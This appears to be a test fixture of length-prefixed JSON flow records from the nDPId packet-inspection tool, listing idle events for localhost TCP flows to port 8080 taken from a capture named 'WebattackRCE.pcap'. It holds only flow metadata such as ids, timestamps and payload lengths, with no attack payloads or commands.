+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7560000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7560000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7560000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7560000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7560000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7560000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 